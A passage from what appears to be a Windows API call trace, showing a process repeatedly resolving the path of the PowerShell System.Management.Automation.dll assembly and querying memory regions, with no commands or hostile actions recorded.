	[0321.041] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.041] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.042] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.042] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.042] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.042] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xc3d5ef7e, Data2=0xfbcf, Data3=0x49c0, Data4=([0]=0xba, [1]=0xc, [2]=0xad, [3]=0xfe, [4]=0x36, [5]=0x55, [6]=0x83, [7]=0xe2))) returned 0x0
	[0321.042] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.043] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.043] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.043] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.043] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.043] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.046] VirtualQuery (in: lpAddress=0x1cb350, lpBuffer=0x1cc210, dwLength=0x30 | out: lpBuffer=0x1cc210*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbed0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbe20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbe20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.046] VirtualQuery (in: lpAddress=0x1cb350, lpBuffer=0x1cc210, dwLength=0x30 | out: lpBuffer=0x1cc210*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.047] VirtualQuery (in: lpAddress=0x1cb3e0, lpBuffer=0x1cc2a0, dwLength=0x30 | out: lpBuffer=0x1cc2a0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cba60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cba60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.047] VirtualQuery (in: lpAddress=0x1cb350, lpBuffer=0x1cc210, dwLength=0x30 | out: lpBuffer=0x1cc210*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.048] VirtualQuery (in: lpAddress=0x1cb3e0, lpBuffer=0x1cc2a0, dwLength=0x30 | out: lpBuffer=0x1cc2a0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cba60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cba60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbed0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbe20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbe20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.049] VirtualQuery (in: lpAddress=0x1cb350, lpBuffer=0x1cc210, dwLength=0x30 | out: lpBuffer=0x1cc210*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.049] VirtualQuery (in: lpAddress=0x1cb3e0, lpBuffer=0x1cc2a0, dwLength=0x30 | out: lpBuffer=0x1cc2a0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cba60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cba60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.050] VirtualQuery (in: lpAddress=0x1cb350, lpBuffer=0x1cc210, dwLength=0x30 | out: lpBuffer=0x1cc210*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.050] VirtualQuery (in: lpAddress=0x1cb3e0, lpBuffer=0x1cc2a0, dwLength=0x30 | out: lpBuffer=0x1cc2a0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbed0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbe20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbe20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbed0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbe20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbe20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.052] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbed0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.052] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbe20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.052] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbe20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.052] VirtualQuery (in: lpAddress=0x1cb350, lpBuffer=0x1cc210, dwLength=0x30 | out: lpBuffer=0x1cc210*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.052] VirtualQuery (in: lpAddress=0x1cb3e0, lpBuffer=0x1cc2a0, dwLength=0x30 | out: lpBuffer=0x1cc2a0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.052] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.052] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cba60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cba60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.053] VirtualQuery (in: lpAddress=0x1cb350, lpBuffer=0x1cc210, dwLength=0x30 | out: lpBuffer=0x1cc210*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.053] VirtualQuery (in: lpAddress=0x1cb3e0, lpBuffer=0x1cc2a0, dwLength=0x30 | out: lpBuffer=0x1cc2a0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cba60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cba60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.054] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.054] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.054] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
